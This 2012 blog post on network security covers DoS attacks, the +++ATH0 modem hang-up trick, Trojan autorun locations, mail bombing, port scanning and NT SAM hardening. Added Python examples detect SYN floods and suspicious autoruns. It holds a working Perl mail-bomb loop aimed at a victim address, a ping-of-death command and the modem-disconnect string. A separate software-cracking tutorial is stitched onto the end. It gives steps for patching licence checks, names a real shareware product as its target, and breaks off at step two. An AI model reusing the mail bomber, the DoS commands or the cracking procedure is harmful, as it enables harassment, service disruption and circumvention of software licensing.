Friday, 31 August 2012

NETWORK SECURITY

Most computer criminals and hackers succeed not because of their own knowledge but because of the ignorance of users and system administrators about how their systems, servers and networks work. This paper covers:
1. The open ports on which hackers attack.
2. The dangerous kinds of attacks made against servers and administrators.
3. Mechanisms for securing the Windows NT administrator passwords.
The project is based on the practical techniques and tactics of attacking, and on the concepts and mechanisms behind those attacks. To stop net criminals from intruding into their systems, the system administrator should know the drawbacks and loopholes of the OS, the internet and networking.
This paper details the different kinds of attacks that a hacker may launch against an administrator: the concepts and techniques of DoS attacks, controlling and disconnecting remote modems, Trojan attacks, mail bombing and so on. Emphasis is given to the open ports on which the hacker usually attacks.

ATTACKS ON THE SERVER.

DOS ATTACKS
A Denial of Service attack (DoS attack) is now a very common hacking attack. It is defined as an attack on a target system by a malicious attacker that renders the normal services offered by that system unavailable to its legitimate users. The attacker does not need to break into the system; it is enough to make the services offered by the target, or by the network it sits on, unusable for legitimate users.
A DoS attack can be described as one in which the target system's memory or other resources are so clogged that it cannot serve legitimate users, or one in which the target is sent so much data, or data it cannot handle, that it crashes or reboots.

KINDS OF DOS ATTACK
PING OF DEATH:- Ping is part of ICMP, the Internet Control Message Protocol, and is used to troubleshoot TCP/IP networks.
The ping command sends an ICMP echo request datagram to the specified host. If that host is alive, i.e. switched on and reachable, it sends back an echo reply carrying the same data. If the datagram that comes back matches the one that was sent, the host is alive. Ping is therefore basically a command that lets us check whether a host is alive, and it can also be used to measure the time a datagram takes to reach the host and return.
Ping can be abused in two ways. The first is simply to ping a host perpetually: every echo request the host receives costs it a little CPU time and bandwidth to answer, so if requests arrive faster than it can answer them, the host slows down, hangs or, on old systems, reboots.
Because of this, many shell account ISPs hide the ping utility from ordinary users.
It can be found with the command:
whereis ping
On older Unix systems it usually lives in /usr/etc.
On Windows, the following keeps pinging a host until you press Ctrl-C (it sends one request per second, so it is not a real flood; the Unix flood ping is ping -f and needs root):
ping -t hostname
ping -a can be used to resolve the address to a hostname.
We can even ping ourselves. The IP 127.0.0.1 is the local host (loopback), which means that when we connect to 127.0.0.1 we actually connect to our own machine. To ping ourselves perpetually, we give the command:
ping -t 127.0.0.1
However, the flood ping from a single machine no longer works against most hosts, as the operating systems have been updated and answer echo requests cheaply.
The second abuse, the actual Ping of Death, is an oversized datagram. The following command on Windows 95 creates an echo request with 65,510 bytes of data; with the 8-byte ICMP header and the 20-byte IP header it exceeds the 65,535-byte limit of an IP packet, and a receiving stack that did not check this while reassembling the fragments overflowed its buffer:
C:\windows>ping -l 65510 hostname
This could hang or crash the victim's computer. Modern operating systems have been patched against it.
FPING UTILITY: this tool sends echo requests to a large number of systems at once. Normal ping sends echoes to one system at a time; fping sends echo requests to a whole network in a single run, so it is more efficient for scanning.
SYN FLOOD ATTACK:- SYN flooding is flooding the target system with so many connection requests that all its memory gets used up trying to establish proper connections for these requests. Since the target's memory is consumed by half-open connections, it is unable to provide services even to legitimate users. The SYN attack abuses the TCP/IP three-way handshake. Whenever a client wants to establish a connection with a host, three steps take place, known as the three-way handshake:
1. The client system sends a SYN packet to the remote host.
Client---------------SYN packet---------------Host
2. The remote host replies with a SYN/ACK packet to the client.
Host----------------SYN/ACK packet-------------Client
3. The client replies with an ACK packet, acknowledging the packet sent by the host in step 2.
Client------------------ACK----------------------Host
Only when all three steps are completed is a TCP connection established between the source and the destination.
In a SYN attack, many SYN packets are sent to the server, all with a bad (spoofed) source IP address. When the server receives these SYN packets it tries to respond to each with a SYN/ACK and then waits for the ACK to come back from the spoofed address. As that address either does not exist or never sent a SYN, the ACK never arrives, so each request stays half-open and holds an entry in the server's connection queue. With enough such requests the queue and memory of the system fill up and it cannot respond to legitimate users; the server may eventually crash, hang or reboot.
According to the rules of TCP/IP, after a certain time a timeout occurs: the connection requests queued by the target system are discarded and the memory they held is freed. So in a SYN flood the attacker keeps sending connection requests faster than they time out, and the target system stays stuck.
To check whether we are being attacked, type the command:
C:\windows>netstat -a
This will show something like:
Active Connections
Proto  Local Address  Foreign Address  State
TCP    aditya         201.xx.34.23     SYN_RECEIVED
TCP    aditya         201.xx.34.23     SYN_RECEIVED
TCP    aditya         201.xx.34.23     SYN_RECEIVED
TCP    aditya         201.xx.34.23     SYN_RECEIVED
TCP    aditya         201.xx.34.23     SYN_RECEIVED
TCP    aditya         201.xx.34.23     SYN_RECEIVED
TCP    aditya         *.*              ESTABLISHED
If the command shows a lot of connections in the SYN_RECEIVED state, the system is probably under SYN attack. Connections in the ESTABLISHED state are completed, legitimate connections. (On Linux the same state is printed as SYN_RECV.)
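The check above can be automated. The following is an added example, not code from the original article: it parses a netstat listing of the shape shown above and counts half-open connections per foreign host. The listing embedded in it is constructed for the example (hostname aditya, documentation-range addresses), not captured from a real machine.

```python
# Added example (not from the original article): spot a SYN flood in
# "netstat -a" style output by counting half-open connections.
# The sample text below is constructed to look like the listing above; it
# was not captured from a real host.
import re
from collections import Counter

SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address      Foreign Address        State
  TCP    aditya:80          203.0.113.23:1025      SYN_RECEIVED
  TCP    aditya:80          203.0.113.23:1026      SYN_RECEIVED
  TCP    aditya:80          203.0.113.23:1027      SYN_RECEIVED
  TCP    aditya:80          203.0.113.23:1028      SYN_RECEIVED
  TCP    aditya:80          203.0.113.23:1029      SYN_RECEIVED
  TCP    aditya:80          203.0.113.23:1030      SYN_RECEIVED
  TCP    aditya:80          198.51.100.7:40012     ESTABLISHED
  TCP    aditya:443         198.51.100.9:51120     ESTABLISHED
  TCP    0.0.0.0:21         0.0.0.0:0              LISTENING
"""

# One netstat row: protocol, local address, foreign address, optional state
# (UDP rows print no state).
ROW_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s*(\S*)\s*$")

# Windows prints SYN_RECEIVED, Linux prints SYN_RECV for the same TCP state.
HALF_OPEN_STATES = {"SYN_RECEIVED", "SYN_RECV"}


def parse_netstat(text):
    """Return a list of (proto, local, foreign, state) tuples, skipping headers."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append(m.groups())
    return rows


def host_of(addr):
    """Strip the ':port' suffix from 'host:port'; plain hostnames pass through."""
    host, sep, _port = addr.rpartition(":")
    return host if sep else addr


def half_open_by_source(rows):
    """Count half-open TCP connections per foreign host."""
    counts = Counter()
    for proto, _local, foreign, state in rows:
        if proto == "TCP" and state in HALF_OPEN_STATES:
            counts[host_of(foreign)] += 1
    return counts


def total_half_open(rows):
    """Total number of half-open TCP connections, whatever their source."""
    return sum(half_open_by_source(rows).values())


def syn_flood_suspects(text, threshold=5):
    """Foreign hosts with at least `threshold` half-open connections to us."""
    counts = half_open_by_source(parse_netstat(text))
    return {host: n for host, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    print("half-open connections:", total_half_open(rows))
    print("suspects:", syn_flood_suspects(SAMPLE_NETSTAT))
```

Two caveats when using this on a real host. In a real SYN flood the source addresses are spoofed and usually random, so the per-host count may show nothing unusual while the total number of half-open connections is what matters; compare it against the listen backlog of the service. Modern kernels also defend with SYN cookies, which answer SYNs without queueing state, so a flooded server may show far fewer SYN_RECEIVED entries than it is actually receiving.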
CONTROLLING AND DISCONNECTING REMOTE MODEMS.
Let our IP address be xx.xx.xx.xx and the server we are connecting to have the IP yy.yy.yy.yy. If we take a single data packet and send it to yy.yy.yy.yy, the packet takes the following path to reach its destination:
Data packet at source-----------Modem of source-------------Router------------
Modem of destination---------------Destination server.
Thus each data packet goes VIA A MODEM, both at the source and at the destination. All data goes through the modems, and that data may contain a modem command.
A system controls its modem by issuing commands generally referred to as AT commands. The letters AT precede all modem commands, with a few exceptions.
An example of an AT command is the one issued when you dial into your ISP. When you click on the 'connect' button, the DUN (Dial-Up Networking) software sends your modem the command:
ATDT (tone dialling) or ATDP (pulse dialling), followed by the number you want to dial and a carriage return.
To accept a command, the modem must be in command mode.
A modem is always either in command mode or in online (data) mode. When the system boots up, the modem is in command mode by default. While the modem is in command mode, AT strings are treated as commands; while it is in online mode, everything is treated as data to be transmitted.
When we are connected to the internet the modem is in online mode, and so it does not accept commands. This means that if we know someone's IP address and send a modem command string to it, the modem will treat it as ordinary data and not react to it. The modem first has to be switched into command mode.
When the modem is in online mode it can be brought into command mode by sending it the escape sequence, +++. The escape sequence (with a pause, the guard time, before and after it) switches the modem to command mode, and it then starts reacting to AT commands.
To return the modem to online mode, the ATO command is given.
So if we know someone's IP address, and we can get the +++ string followed by AT commands to pass through their modem, we can practically control the remote modem and do anything with it.
H0 is the AT command that instructs the modem to hang up, i.e. disconnect.
If we want to disconnect our own modem, we issue the following command:
+++ATH0
This switches the modem from online mode to command mode and then sends it the H0 command, which disconnects it.
If we can get this string to a remote modem, it will disconnect that one too.
NOTE: the +++ATH0 trick does not work on all modems.
The way the attack works is that it hides the escape and command sequence in an ICMP echo request packet (the packet's data contains the string +++ATH0). The +++ puts the modem into escape mode, and if the guard time on the modem is set very low it drops into command mode immediately and accepts the AT commands that follow. The target system receives the echo request, builds an echo reply with a new checksum and swapped source and destination hosts, and returns the same data to the sender. As the reply goes out through the target's modem, the string is sent to the modem and the command is executed. There are a few conditions that must be met for this to work:
1. The target computer must not filter ICMP echo requests and must reply to them.
2. The target computer must be using a modem.
3. The target computer must have a vulnerable modem, i.e. the guard time must be set very low.
4. Spoofed packets (with a bad source IP) should be sent to the target computer, otherwise the target can see where they came from.
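To make the echo mechanism concrete, here is an added example (not code from the article, and it sends nothing on the network): it assembles the ICMP echo request that ping sends, with the RFC 1071 checksum, and then does what the replying host does, copying identifier, sequence number and data into an echo reply. The payload used is the string the text discusses; the identifier and sequence values are arbitrary.

```python
# Added example (not from the original article): build an ICMP echo request
# carrying an arbitrary payload, and show what the target's reply looks like.
# Nothing here touches the network; the packets are just bytes.
import struct

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0
HEADER = struct.Struct("!BBHHH")  # type, code, checksum, identifier, sequence


def inet_checksum(data):
    """RFC 1071 ones'-complement checksum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"                      # pad odd-length data
    total = sum(int.from_bytes(data[i:i + 2], "big") for i in range(0, len(data), 2))
    while total >> 16:                       # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type, ident, seq, payload):
    """Assemble an ICMP echo packet (header + data) with a valid checksum."""
    header = HEADER.pack(icmp_type, 0, 0, ident, seq)   # checksum field zeroed
    csum = inet_checksum(header + payload)
    return HEADER.pack(icmp_type, 0, csum, ident, seq) + payload


def build_echo_request(ident, seq, payload):
    return build_echo(ICMP_ECHO_REQUEST, ident, seq, payload)


def parse_echo(packet):
    """Verify the checksum and split a packet into (type, code, ident, seq, payload)."""
    if len(packet) < HEADER.size:
        raise ValueError("short ICMP packet")
    if inet_checksum(packet) != 0:           # a packet with a valid checksum sums to zero
        raise ValueError("bad ICMP checksum")
    icmp_type, code, _csum, ident, seq = HEADER.unpack_from(packet)
    return icmp_type, code, ident, seq, packet[HEADER.size:]


def answer_echo_request(request):
    """What a host does with an echo request: copy ident, seq and data into a reply.

    The data is echoed back untouched, which is why a payload such as
    '+++ATH0' travels out through the replying host's modem."""
    icmp_type, _code, ident, seq, payload = parse_echo(request)
    if icmp_type != ICMP_ECHO_REQUEST:
        raise ValueError("not an echo request")
    return build_echo(ICMP_ECHO_REPLY, ident, seq, payload)


if __name__ == "__main__":
    req = build_echo_request(0x1234, 1, b"+++ATH0")
    rep = answer_echo_request(req)
    print("request:", req.hex())
    print("reply:  ", rep.hex())
```

Note what the example also makes visible: the reply carries the bytes as data, not as a separate command, and a modem with the default Hayes guard time (about one second of silence before and after the +++) will not switch modes on an escape sequence buried inside a stream of packets. That is why condition 3 above, a very low guard time, is essential.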
TROJAN/KEY LOGGER ATTACKS
A Trojan is a program which, once installed on a system, can be misused for malicious purposes by the attacker. Trojans are capable of doing a lot of harm to the target computer.
Almost all Trojans are made up of two parts:
1. THE SERVER PART: this part of the Trojan has to be installed and running on the target system.
2. THE CLIENT PART: this part of the Trojan is installed and run on the attacker's computer.
A Trojan attack proceeds as follows:
1. The attacker tries to install the server part of the Trojan on the target system, by one of the following methods:
(a) Sending the Trojan disguised as a normal file through ICQ or any other instant messaging software.
(b) Installing the Trojan on the target computer manually.
(c) By trickery: the attacker hides the Trojan server inside a normal .EXE file, chosen because the victim will find the file useful and will install the infected file himself.
2. Once the attacker has got the Trojan server onto the target system, it binds to a particular port on the target computer and listens for connections. Each Trojan has a particular port to which it binds.
3. With the server listening for connections, the attacker tries to find out the IP address of the target computer.
4. As soon as the attacker has the IP address of the target system, he connects to it with the client part of the Trojan from his own system and is then able to control the target. Using the Trojan, the attacker enjoys full control of the target system.
DETECTION OF A TROJAN:
Almost all Trojans are loaded into memory each time Windows boots up. The common locations where they are known to hide are:
(A) THE STARTUP FOLDER: c:\windows\start menu\programs\startup
The location of this folder is stored in the registry:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
Common Startup="c:\windows\start menu\programs\startup"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]
Startup="c:\windows\start menu\programs\startup"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
Startup="c:\windows\start menu\programs\startup"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]
Common Startup="c:\windows\start menu\programs\startup"
A Trojan that changes these values can point the startup folder somewhere else entirely, so the values are worth checking as well as the folder itself.
(B) SYSTEM FILES: the two system files win.ini (its load= and run= lines) and system.ini (its shell= line) are also processed at boot.
(C) BATCH FILES: the two batch files autoexec.bat and winstart.bat are also executed, and may contain malicious commands.
(D) THE WINDOWS REGISTRY: Trojans may also register themselves in the registry; the programs listed under the following keys are executed when Windows boots:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]
By monitoring these and similar places we can detect the presence of a Trojan.
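Monitoring these locations can be scripted. The following is an added example, not code from the article: it reads a registry export in .reg format (what regedit produces for the keys above), lists the Run/RunOnce/RunServices entries and the startup-folder values, and flags the ones that deserve a closer look. The .reg text, the value names, the program paths and the "trusted directories" baseline are all constructed for the example.

```python
# Added example (not from the original article): go through an exported
# registry file and flag Run/RunOnce/RunServices entries and startup-folder
# redirections that point somewhere unexpected. The .reg text below is
# constructed for the example; the paths and value names are made up.
import re

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"ScanRegistry"="c:\\windows\\scanregw.exe /autorun"
"SystemTray"="SysTray.Exe"
"Patch"="c:\\windows\\temp\\patch.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Updater"="\"c:\\program files\\updater\\update.exe\" /silent"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup"="c:\\windows\\start menu\\programs\\startup"
'''

AUTORUN_KEYS = ("run", "runonce", "runservices", "runservicesonce")
# Assumed baseline for this example: programs started from these directories
# are considered expected; anything else is reported for a closer look.
TRUSTED_DIRS = (r"c:\windows\system", r"c:\windows\system32", r"c:\program files")
TRUSTED_FILES = (r"c:\windows\scanregw.exe",)

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def unescape(s):
    """Undo .reg string escaping: a backslash-escaped character stands for itself."""
    return re.sub(r'\\(.)', r'\1', s)


def parse_reg(text):
    """Yield (key, value_name, value_data) for every string value in the export."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            yield key, unescape(m.group(1)), unescape(m.group(2))


def executable_of(command):
    """Pull the program path out of a command line, quoted or not."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def is_trusted(path):
    p = path.lower()
    return p in TRUSTED_FILES or any(p.startswith(d + "\\") for d in TRUSTED_DIRS)


def suspicious_autoruns(text):
    """Return [(key, name, program, reason)] for entries that merit a look."""
    findings = []
    for key, name, data in parse_reg(text):
        leaf = key.rsplit("\\", 1)[-1].lower()
        if leaf in AUTORUN_KEYS:
            prog = executable_of(data)
            if "\\" not in prog:
                findings.append((key, name, prog, "bare filename, resolved via PATH"))
            elif not is_trusted(prog):
                findings.append((key, name, prog, "starts from an untrusted directory"))
        elif leaf in ("shell folders", "user shell folders") and name.lower() in ("startup", "common startup"):
            if not data.lower().endswith(r"\start menu\programs\startup"):
                findings.append((key, name, data, "startup folder redirected"))
    return findings


if __name__ == "__main__":
    for finding in suspicious_autoruns(SAMPLE_REG):
        print(finding)
```

The bare-filename case is reported separately on purpose: an entry like SysTray.Exe is normal on Windows 9x, but an attacker can plant a file of the same name earlier on the PATH, so it is worth confirming which file actually gets run.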

MAIL BOMBING
Mail bombing means sending a huge number of emails to a single email account so that the account's quota is filled, the user can no longer receive mail, and reading the existing mail becomes difficult.
Mail bombing is of two types:
1. THE MASS MAIL BOMBING METHOD: in this kind of attack the user's account is filled with a huge number of emails. There are mail bombing programs which send a particular message repeatedly through an SMTP server or a local mailer. Such a program is easily written in Perl, e.g.:
#!/usr/bin/perl
use strict;
use warnings;

my $mprogram = '/usr/lib/sendmail';    # local mailer, reads the message on stdin
my $victim   = 'victim@hostname.com';
my $var      = 0;
while ($var < 1000) {
    # pipe one message into sendmail, addressed to the victim
    open(MAIL, "|$mprogram $victim") || die "can't open mail program: $!";
    print MAIL "Subject: Mail Bombing\n\nMail Bombing\n";
    close(MAIL);
    sleep(4);
    $var++;
}
This program sends 1000 emails to the target account.
2. LIST LINKING: in this kind of mail bombing the target is subscribed to thousands of mailing lists. It is more effective, because the victim has to unsubscribe himself from every one of those lists.
List linking is done with mail bombing software which asks for the target email address, the address of an SMTP server, and the forged email address from which the subscription requests are to appear.
The software subscribes the victim over and over again, leaving him with a lot of work to do; he may even miss important incoming mail among the flood.
If you are the victim of this type of attack, do not download all the messages and then delete them. Instead, log on to the POP port of your mail server and delete the useless messages with POP commands (LIST, TOP and DELE). By reading the headers of the bombs, the mail bomber can often be traced.

PORT SCANNING

There are basically two kinds of ports: physical (hardware) and virtual (software).
Hardware ports are the sockets on the back of the computer into which other devices are plugged. A software port is a virtual pipe through which information flows. A single system can have a large number of ports. All ports are numbered, and on each open port a particular service or program is listening.
Port scanning is the first step in finding a hackable server, i.e. one with a hole or other vulnerability.
If we were to hack our ISP's server, we would first have to find out the hostname of the server run by the ISP. Each server can have a large number of open ports, and it would take days to go through the services running on each port manually. This is where port scanning utilities come in.
Tools like SATAN list the open ports and the services running on them, and also report vulnerabilities of the target system.
Another thing to be careful about when port scanning an ISP is that most port scanners are easily traceable. Being caught port scanning a host is a sure sign of hacker activity.
To find out the list of open ports on our own system, we give the command:
C:\windows>netstat -a
Ports are of three kinds:
1. THE WELL-KNOWN PORTS: ports numbered from 0 to 1023. This range is bound to the services running on them, so each port number has a specific service associated with it.
E.g. FTP runs on port 21.
2. THE REGISTERED PORTS: ports from 1024 to 49151. This range is not bound to any specific service. Networking programs such as a browser or email client open a random port in this region as their local end and start communicating with the remote server, which is what lets us surf the net.
These ports are simply open so that our applications can do their work; they act as a buffer, passing received packets to the application and vice versa. Once we close the application, these ports are closed automatically.
3. THE DYNAMIC/PRIVATE PORTS: ports from 49152 to 65535. This range is rarely assigned to services, and several Trojans bind ports here.
E.g. Sun starts its RPC ports at 32768 (which is actually still inside the registered range).

BLOCKING THE PORTS:
This is what to do if the netstat command shows a couple of open ports on our system or server:
1. Check a Trojan port list and see whether any open port number matches it. If it does, get a Trojan remover and remove the Trojan. (A port number alone is not proof; find out which program actually owns the port.)
2. We can also remap the ports. Instead of running a service on its well-known port, where it is easily found and exploited, it can be run on a less obvious port, so a hacker has more difficulty locating the service. This method is known as remapping. Note that it only buys obscurity: a full port scan still finds the service, so it must be patched and access-controlled as well.
3. ETHERPEEK is an excellent sniffing program which can easily trace a port scanner.
4. NUKE NABBER, a Windows freeware program, claims to be an excellent port blocker.
5. There are other utilities, such as PORT DUMPER, which can fake daemons (services) like Telnet, finger etc.

SECURING WINDOWS NT ADMINISTRATOR PASSWORDS
(Source: www.ntbugtraq.ntadvice.com/default.asp)
The NT Security Accounts Manager (SAM) is the database that holds the passwords of Windows NT accounts, including the Administrator. The SAM stores the usernames of all local accounts on the machine (or all domain accounts, on a domain controller) together with their password hashes. Cracking the hashed passwords stored in the SAM is all an attacker needs to control the entire network.
By default a backup of the SAM is stored in the file %systemroot%\repair\sam._, and by default this directory gives Everyone read access. It is therefore possible to retrieve the hashed passwords directly from this file. For the same reason, no one but administrators should have write access to the root of the %systemroot% drive, so that system files cannot be manipulated.
Recently a method of recovering NT users' passwords from their hashes was published.
This created a scary concern over the security of the Windows NT Administrator account.
Hence the following RECOMMENDATIONS to secure the file %systemroot%\repair\sam._ [this file stores the backup of the SAM, which stores the password hashes, and so is one of the most important files on the system]:
TO SECURE THE %systemroot%\repair\sam._ FILE:
By default, the SAM._ file and the \repair directory have the following permissions:
Administrators, SYSTEM: Full Control
Everyone: Read
Power Users: Change
1. From within Explorer, highlight the SAM._ file, right-click, choose Properties, Security, Permissions, and remove all permissions from this file.
2. From a DOS prompt, execute the following:
cacls %systemroot%\repair\sam._ /D Everyone
This denies the group Everyone access to the file, ensuring that no other permission can override the file permission.
3. Whenever you need to update your ERD (Emergency Repair Disk), first execute the following at the DOS prompt:
cacls %systemroot%\repair\sam._ /T /G Administrators:C
This grants Administrators Change permission so the file can be updated during the ERD update (the SAM database is backed up whenever the ERD is updated). Note that cacls without /E replaces the whole ACL, so the Everyone deny from step 2 is gone at this point.
4. Once the ERD has been updated, execute the following at the DOS prompt:
cacls %systemroot%\repair\sam._ /E /R Administrators
This once again removes the permission for Administrators; re-run step 2 if you want the explicit deny back.
The file is then fully secured.

All about Cracking

How to crack software – a beginner's tutorial!

Introduction:

I have read many cracking tutorials lately. Frankly speaking, I myself learned cracking from tutorials (and some books, but this doesn't really matter). The majority of the cracking tutorials out there have one of two disadvantages: either they are too long and contain a lot of garbage, or they are too short and don't cover the basics.

I decided to write a tutorial which has neither of those two disadvantages.

Anyway, I divided the tutorial into 3 parts:

Part 1: Introduction, tools and The basics of cracking.

Part 2: Practical training, using W32Dasm, and HIEW

Part 3: Key-generators.

Welcome to the first part. ;-)

1. Disclaimer:

I created this tutorial for informational purposes only!
Much of the information in this document can be used to perform illegal activities!
Don't attempt to do anything stated in this document!
If you do attempt to do anything, you are solely and fully responsible for what you do!
If you get caught and get in any kind of trouble, it's your own fault!
If you intend to use this information to impress your friends, leave it and grow up!
If you don't agree to this, do not read any more!
If you crack a program, and either sell the crack or offer it for free, it is a crime!

2. What is Cracking?

For me, cracking is:
"Letting a program which is on your computer behave as you want it to behave, and not as someone else (the programmer) wants"

As INTERN said: "Hey, it is your stuff right? your numbers, your bits, you should be able to do anything you wish to do with it "

Actually, I agree with this.

So cracking is modifying your programs and making them work the way you want them to. You can get a free demo program, crack it, and use it. BUT!!!! I repeat, if you crack a program and start selling the cracked version, or even offer it for free, it is a crime!

After reading these three tutorials (this is the first one in the series), you will feel the power you have in your hands (I mean, in your head).

Well, let's get started.

3. Tools

There are very few tools you need for now. They are very easy to find on the web, because they are quite popular:

The first one is "Win32 Disassembler", also known as W32Dasm.

The Win32 Disassembler allows you to:

1. Disassemble files - translate the program from machine code back into assembly language.
The file types which can be disassembled in Win32 Disassembler are:
exe, 386, com, cpl, drv, dll, fon, mpd, ocx, vbx and sys.
2. Load the program as a process and trace (debug) it.
3. Browse the disassembled file and go to any code location that you want.
4. Find text.
5. Execute, insert or remove jumps and calls.
6. Show imported and exported functions.
7. Show a hex display of a code area.
8. Show the list of STRINGS, DIALOGS and REFERENCES.
9. Save the disassembly in text format.

Well, you can get it on almost any cracking site, but I'll give you a URL:

1. http://wowsites.com/meiner/w32dsm89.zip

The second tool you need is Hiew, also known as Hacker's View. Hiew allows you to:

1. Disassemble files.
2. Make changes in the disassembled file, such as writing new instructions or modifying existing ones, and assemble them back into the file.
3. View the file in ASCII, hex or assembly mode.

You can also download an excellent program for cracking called SoftICE. We won't need it in this part of the tutorial, but here is a URL for SoftICE:

link - http://www.plunder.com/Softice-Insta...load-83770.htm

4. The main steps of cracking

There are 7 steps in the process of cracking:

1. Run the program you want to crack and learn its standard behaviour. Try to locate strings and keywords, try to enter a password and see how the program responds.
2. Open the program in W32Dasm and disassemble it.
3. Find in the disassembly the typical strings that appeared in the program. In most cases you have to look for keywords such as: password, name, date, expired, time limit, wrong, entered and so on.
4. Find and study the password check: find the protection routine and the API calls it makes.
5. Try to understand the jumping mechanism of the protection.
6. Open the program in Hiew. Change the conditional jump that controls the flow to its opposite jump, or NOP it out.
7. Run the program and see how the change you have made affected it. Feel the power you have, the power of cracking, letting programs behave as you want them to.

Learn these steps very well, until you dream of them; you will use them in every program you crack.

5. Basic terms in Assembly

A. Registers:

Registers are variables which are stored in your processor. The processor uses these variables for basic mathematical and logical operations. The most used registers are eax, ebx, ecx and edx. Sometimes you will see edi, esi, esp and ebp. There are three sizes of register: 32-bit, 16-bit and 8-bit. The 32-bit registers start with e, such as eax. Each has a 16-bit equivalent holding its lower half; the only difference between the two is the size of the value. These are ax, bx, cx, dx, di, si, sp and bp. There are also 8-bit registers: al, ah, bl, bh, cl, ch, dl and dh, where l means the lower 8 bits and h the higher 8 bits of the corresponding 16-bit register.

B. Flags:

Flags are Boolean variables (they hold 0 or 1). The processor sets them as a side effect of its logical and arithmetic operations to record something about the result. The most important flag is the Zero Flag (ZF), which is set to 1 when the result of the last operation was zero and to 0 otherwise.

C. Code Flow

When you are analysing a piece of code, you must understand that the processor is actually quite stupid: all it does is follow the basic instructions, one after another. It does exactly what the code tells it to do, and cannot do anything that is not written in the code (unless it has been run over by a herd of cows and abducted by aliens). This is why you have to think like the processor when you are analysing a piece of code, and act like it (just don't get used to it! Inhale, exhale, inhale, exhale... nevermind, stupid joke). You have to do everything the processor does: compare registers and variables, execute jumps and calls, calculate basic mathematical operations, store and load register values and addresses, and so on. The processor has an instruction pointer especially for this, also called IP (it has nothing to do with IP addresses in the Internet Protocol, trust me). The instruction pointer always points to the instruction that is about to be executed. The processor also has instructions which change the code flow: function calls and other routine calls, unconditional jumps, and conditional jumps, which are taken or not depending on flags such as the zero flag.

6. Conclusion

In this part of the tutorial we have learnt the meaning of the word cracking: making programs behave the way you want them to, and not the way the programmer wants them to. We have also learnt about the basic and popular tools of cracking: W32Dasm, Hiew and SoftICE. And finally we have learnt the 7 main steps of cracking.
Now, before you go on to the next chapter, you have to learn these 7 steps and download the tools mentioned above, because we can't go on unless you have those tools and know the steps.

Part 2

0. Introduction:

In this part, the second part of the cracking tutorial, you will learn to use the most important tools of the common cracker: W32Dasm and HIEW. You will also learn to crack some simple programs.
The tutorials are divided into 3 parts:

Part 1:Introduction, tools and the basics of cracking.
Part 2: Practical training, using W32Dasm, and HIEW.
Part 3: key-generators

1. Disclaimer:


I created this tutorial for informational purposes only!
Much of the information in this document can be used to perform illegal activities!
Don't attempt to do anything stated in this document!
If you do attempt to do anything, you are solely and fully responsible for what you do!
If you get caught and get in any kind of trouble, it's your own fault!
If you intend to use this information to impress your friends, leave it and grow up!
If you don't agree to this, do not read any more!
If you crack a program, and either sell the crack or offer it for free, it is a crime!

2. The main steps of cracking

You have already seen these steps in the previous part of the tutorial, but it's very important to know them. Remembering these steps and following them is 40% of the way towards success in cracking a program!!!

There are 7 steps in the cracking process:

1. Run the program you want to crack and study its behaviour. Try to locate strings and keywords, try to enter a password and see how the program responds.
2. Open the program in W32Dasm and disassemble it.
3. Find in the disassembly the typical strings that appeared within the program. In most cases you have to look for keywords such as: password, name, date, expired, time limit, wrong, entered and so on.
4. Find and study the password check: find the protection routine and the API calls it makes.
5. Try to understand the jumping mechanism of the protection.
6. Open the program in Hiew. Change the conditional jump that controls the flow to its opposite jump, or NOP it out.
7. Run the program and check how the change you have made affected it. Feel the power you have, the power of cracking, making programs behave the way you want them to.

Learn these steps very well, until you dream of them; you will use them in every program you crack.

3. Additional programs you need for this part of the tutorial

By now you have learnt the main steps of cracking. Now you are going to crack your first program.

But before that, you need to get a little program called "Sweet Little Piano". You can download it from: http://www.ronimusic.com/

Now that you have the program, let's start!

4. Cracking the first program (Sweet Little Piano)

Now we will follow each step and crack the program:

Step 1: Running the program:

Well, run it! Duh... :-)

Well, what do we see here..... The program opens two text files. Also we see "Unregistered Shareware" on the caption bar...
Now let's open the Help menu for any registration options... Hmm, what do we see here now...
oh, it's a password option... Well, select it and enter something (don't hope it will be right :-)) to see what happens... Click
OK.. Hmm, nothing happens.... Maybe it accepted it? Hmm.. no way... the caption bar still says Unregistered... Ok, close it...
bah ... more text files ... and a notification that the settings are not saved in the unregistered version ... well ... kind of
irritating, those text files! Let's fix it :-)

Step 2: Disassemble the program:

